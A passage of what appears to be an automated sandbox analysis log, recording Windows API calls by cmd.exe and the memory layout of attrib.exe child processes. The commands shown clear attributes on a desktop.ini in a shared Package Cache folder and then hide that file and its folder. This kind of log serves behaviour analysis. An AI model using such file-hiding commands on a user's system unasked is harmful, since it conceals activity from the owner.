(in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.783] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.783] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0207.807] _close (_FileHandle=3) returned 0 [0207.807] GetConsoleTitleW (in: lpConsoleTitle=0x12f1f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.807] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.807] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.807] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.807] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.808] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.808] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0207.808] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0207.808] GetConsoleTitleW (in: lpConsoleTitle=0x12ef84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.808] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee0c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12eed4 | out: lpAttributeList=0x12ee0c, lpSize=0x12eed4) returned 1 [0207.808] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee0c, dwFlags=0x0, Attribute=0x60001, lpValue=0x12eecc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee0c, lpPreviousValue=0x0) returned 1 [0207.808] GetStartupInfoW (in: lpStartupInfo=0x12edc8 | out: lpStartupInfo=0x12edc8*(cb=0x44, lpReserved="", 
lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.808] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.808] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12ee68*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12eeb4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" ", lpProcessInformation=0x12eeb4*(hProcess=0x4c, hThread=0x50, dwProcessId=0x87c, dwThreadId=0x8b8)) returned 1 [0207.810] CloseHandle (hObject=0x50) returned 1 [0207.810] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.810] GetEnvironmentStringsW () returned 0x232d50* [0207.810] FreeEnvironmentStringsW (penv=0x232d50) returned 1 [0207.810] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0207.843] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12eda8 | out: lpExitCode=0x12eda8*=0x0) returned 1 [0207.843] CloseHandle (hObject=0x4c) returned 1 [0207.843] _vsnwprintf (in: _Buffer=0x12eef0, _BufferCount=0x13, _Format="%08X", _ArgList=0x12edb4 | out: _Buffer="00000000") returned 8 [0207.843] SetEnvironmentVariableW 
(lpName="=ExitCode", lpValue="00000000") returned 1 [0207.844] GetEnvironmentStringsW () returned 0x232d50* [0207.844] FreeEnvironmentStringsW (penv=0x232d50) returned 1 [0207.844] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.844] GetEnvironmentStringsW () returned 0x232d50* [0207.844] FreeEnvironmentStringsW (penv=0x232d50) returned 1 [0207.844] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee0c | out: lpAttributeList=0x12ee0c) [0207.844] GetConsoleTitleW (in: lpConsoleTitle=0x12f1f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.844] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.844] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0207.844] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.844] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.845] FindClose (in: hFindFile=0x230830 | out: hFindFile=0x230830) returned 1 [0207.845] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0207.845] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0207.845] GetConsoleTitleW (in: lpConsoleTitle=0x12ef84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.845] InitializeProcThreadAttributeList (in: lpAttributeList=0x12ee0c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12eed4 | out: lpAttributeList=0x12ee0c, lpSize=0x12eed4) returned 1 [0207.845] UpdateProcThreadAttribute (in: lpAttributeList=0x12ee0c, dwFlags=0x0, Attribute=0x60001, lpValue=0x12eecc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12ee0c, lpPreviousValue=0x0) returned 1 [0207.845] GetStartupInfoW (in: 
lpStartupInfo=0x12edc8 | out: lpStartupInfo=0x12edc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0207.845] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0207.845] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12ee68*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12eeb4 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"", lpProcessInformation=0x12eeb4*(hProcess=0x50, hThread=0x4c, dwProcessId=0xff0, dwThreadId=0xec8)) returned 1 [0207.847] CloseHandle (hObject=0x4c) returned 1 [0207.847] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0207.847] GetEnvironmentStringsW () returned 0x233790* [0207.847] FreeEnvironmentStringsW (penv=0x233790) returned 1 [0207.847] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0207.907] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12eda8 | out: lpExitCode=0x12eda8*=0x0) returned 1 [0207.907] CloseHandle (hObject=0x50) returned 1 [0207.907] _vsnwprintf (in: _Buffer=0x12eef0, _BufferCount=0x13, _Format="%08X", _ArgList=0x12edb4 | out: _Buffer="00000000") returned 8 [0207.907] 
SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.907] GetEnvironmentStringsW () returned 0x233790* [0207.907] FreeEnvironmentStringsW (penv=0x233790) returned 1 [0207.907] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.907] GetEnvironmentStringsW () returned 0x233790* [0207.907] FreeEnvironmentStringsW (penv=0x233790) returned 1 [0207.907] DeleteProcThreadAttributeList (in: lpAttributeList=0x12ee0c | out: lpAttributeList=0x12ee0c) [0207.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.907] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.908] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.908] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.908] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.908] SetConsoleInputExeNameW () returned 0x1 [0207.908] GetConsoleOutputCP () returned 0x1b5 [0207.908] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.908] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.908] exit (_Code=0) Process: id = "502" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x95c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "501" os_parent_pid = "0x86c" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" 
[0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30619 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30620 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30621 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30622 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 30623 start_va = 0xd80000 end_va = 0xd86fff entry_point = 0xd80000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30624 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30625 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30626 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30627 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 30628 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30629 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30630 start_va = 0x20000 end_va 
= 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30631 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30632 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 30633 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 30634 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30635 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30636 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30637 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30638 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30639 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: 
id = 30640 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30641 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30642 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30643 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30644 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30645 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30646 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 30647 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30648 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 699 os_tid = 0xe00 Process: id = "503" image_name = "attrib.exe" filename = 
"c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0x87c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "501" os_parent_pid = "0x86c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30649 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30650 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30651 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30652 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 30653 start_va = 0xf50000 end_va = 0xf56fff entry_point = 0xf50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30654 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30655 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 
"c:\\windows\\system32\\apisetschema.dll") Region: id = 30656 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30657 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30658 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30659 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30660 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30661 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30662 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 30663 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 30664 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30665 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30666 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: 
"c:\\windows\\system32\\rpcrt4.dll") Region: id = 30667 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30668 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30669 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30670 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30671 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30672 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30673 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30674 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30675 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" 
filename = "" Region: id = 30676 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 30677 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30678 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 700 os_tid = 0x8b8 Process: id = "504" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e00" os_pid = "0xff0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "501" os_parent_pid = "0x86c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30679 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30680 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30681 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30682 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000210000" filename = "" Region: id = 30683 start_va = 0xd00000 end_va = 0xd06fff entry_point = 0xd00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30684 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30685 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30686 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30687 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30688 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30689 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30690 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30691 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 30692 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30693 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = 
"private_0x00000000003a0000" filename = "" Region: id = 30694 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30695 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30696 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30697 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30698 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30699 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30700 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30701 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30702 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" 
